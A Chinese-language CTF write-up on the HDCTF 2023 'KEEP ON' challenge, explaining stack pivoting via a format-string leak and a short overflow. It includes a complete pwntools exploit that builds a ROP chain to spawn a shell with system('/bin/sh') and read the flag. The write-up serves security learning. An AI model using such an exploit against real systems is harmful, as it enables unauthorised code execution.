栈迁移([HDCTF 2023]KEEP ON)

栈迁移

[HDCTF 2023]KEEP ON | NSSCTF

  1. 题目给了一个格式化字符串的漏洞,和一个栈溢出漏洞,但是栈溢出的位置有限,只能溢出到返回值的位置,这样构造的ROP链不能完全写入到栈上,需要进行栈迁移:

  2. 确定栈迁移的目标位置:输入数组s的首地址,首先利用而格式化字符串泄漏bp寄存器指向的栈上的数据(是函数调用者即vuln的栈低指针),根据该值可以确定与s首地址的偏移x,从而用 泄漏的数据-x 来覆盖bp处的值, 泄漏的数据-x 处即为新的栈空间。

    • 调试确定 格式化字符串泄漏数据的位置bp处值与s的偏移量 ,可以看到bp寄存器指向的位置在输出字符串中的 第16个 ,s的首地址(0x7fffffffddb0)与泄漏的值(0x7fffffffde10)之间的距离相差 0x60

  3. EXP,其中 target+40 是我们输入字符串 b'/bin/sh' 的地址,要放在 pop_rdi_ret 传参:

    python 复制代码
    from pwn import *    
    context(os='linux', arch='amd64', log_level='debug')
    p=remote('node4.anna.nssctf.cn',28697)
    
    #ROPgadget获取一些必要指令的地址
    leave_ret = 0x4007f2	#栈迁移使用
    pop_rdi_ret = 0x4008d3	#传参使用
    ret_addr = 0x4005b9		#栈平衡使用
    sys_addr = 0x4005E0		#挟制ip使用
    p.recvuntil(b'please show me your name: \n')
    
    #泄漏地址
    payload = b'%16$p'
    p.sendline(payload)
    p.recvuntil(b'hello,')
    target = eval(p.recv(14).decode())
    print(hex(target))
    p.recvuntil(b'keep on !\n')
    
    #计算栈迁移后的首地址
    target = target - 0x60
    payload = (b'aaaaaaaa'+p64(ret_addr)+p64(pop_rdi_ret)+p64(target+40)+p64(sys_addr)+b'/bin/sh').ljust(0x50,b'\x00')+p64(target)+p64(leave_ret)
    p.sendline(payload)
    p.sendline(b'cat flag.txt')
    p.interactive()
相关推荐
美式小田1 小时前
Altium Designer学习笔记 21.PCB板框的评估及叠层设置
笔记·嵌入式硬件·学习·ad
NightCyberpunk1 小时前
请求响应(学习笔记)
笔记·学习
2401_879103683 小时前
24.11.25 Mybatis1
笔记
跳跳的向阳花4 小时前
Ajax学习笔记,第一节:语法基础
笔记·学习·ajax·axios
田梓燊5 小时前
湘潭大学软件工程算法设计与分析考试复习笔记(五)
笔记·算法·软件工程
垂杨有暮鸦⊙_⊙5 小时前
蒙特卡洛方法(Monte Carlo,MC)
人工智能·笔记·机器学习·概率论
落霞的思绪6 小时前
Maven学习笔记
笔记·学习·maven
studyForMokey6 小时前
【Android零碎笔记】
android·笔记
IT19957 小时前
Qt笔记-获取HTTP的POST请求提交的数据时需要注意的地方(2024-09-02)
笔记·qt·http
大佬,救命!!!7 小时前
自动化unittest框架
开发语言·笔记·python·算法·pycharm·自动化·unittest